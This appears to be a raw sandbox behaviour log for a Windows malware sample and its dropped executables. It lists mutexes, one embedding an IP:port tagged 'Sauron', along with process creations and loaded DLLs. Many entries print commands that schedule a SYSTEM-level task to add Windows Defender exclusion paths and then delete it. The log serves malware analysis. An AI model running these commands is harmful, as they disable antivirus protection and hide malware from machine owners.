Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2024:120:WilError_03
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Mutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6824:120:WilError_03
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Mutant created: \Sessions\1\BaseNamedObjects\8.210.64.208:8917:Sauron
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3616:120:WilError_03
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Mutant created: \Sessions\1\BaseNamedObjects\aefd_581804
Source: C:\Users\user\Documents\cajXRH.exe	Mutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5772:120:WilError_03
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Mutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03

Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Command line argument: tbcore3.dll	41_2_008A1000
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Command line argument: tbcore3.dll	41_2_008A1000
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Command line argument: tbcore3U.dll	41_2_008A1000
Source: C:\Program Files (x86)\G1f92m\12xy9.exe	Command line argument: tbcore3U.dll	41_2_008A1000

Source: 1387457-38765948.15.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Documents\cajXRH.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\1387457-38765948.15.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1387457-38765948.15.exe

Virustotal: Detection: 8%

Source: 4fkch1.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: 4fkch1.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: 4fkch1.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: 4fkch1.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: 4fkch1.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
Source: 4fkch1.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t

Source: C:\Users\user\Desktop\1387457-38765948.15.exe

File read: C:\Users\user\Desktop\1387457-38765948.15.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\1387457-38765948.15.exe "C:\Users\user\Desktop\1387457-38765948.15.exe"
Source: unknown	Process created: C:\Users\user\Documents\cajXRH.exe C:\Users\user\Documents\cajXRH.exe
Source: unknown	Process created: C:\Users\user\Documents\cajXRH.exe C:\Users\user\Documents\cajXRH.exe
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Program Files (x86)\4fkch1\4fkch1.exe "C:\Program Files (x86)\4fkch1\4fkch1.exe"
Source: unknown	Process created: C:\Program Files (x86)\4fkch1\4fkch1.exe "C:\Program Files (x86)\4fkch1\4fkch1.exe"
Source: unknown	Process created: C:\Program Files (x86)\G1f92m\12xy9.exe "C:\Program Files (x86)\G1f92m\12xy9.exe"
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\G1f92m\12xy9.exe "C:\Program Files (x86)\G1f92m\12xy9.exe"
Source: unknown	Process created: C:\Program Files (x86)\4fkch1\4fkch1.exe "C:\Program Files (x86)\4fkch1\4fkch1.exe"
Source: unknown	Process created: C:\Program Files (x86)\G1f92m\12xy9.exe "C:\Program Files (x86)\G1f92m\12xy9.exe"
Source: unknown	Process created: C:\Program Files (x86)\4fkch1\4fkch1.exe "C:\Program Files (x86)\4fkch1\4fkch1.exe"
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Process created: C:\Program Files (x86)\4fkch1\4fkch1.exe "C:\Program Files (x86)\4fkch1\4fkch1.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini	Jump to behavior

Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: pid.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\user\Desktop\1387457-38765948.15.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
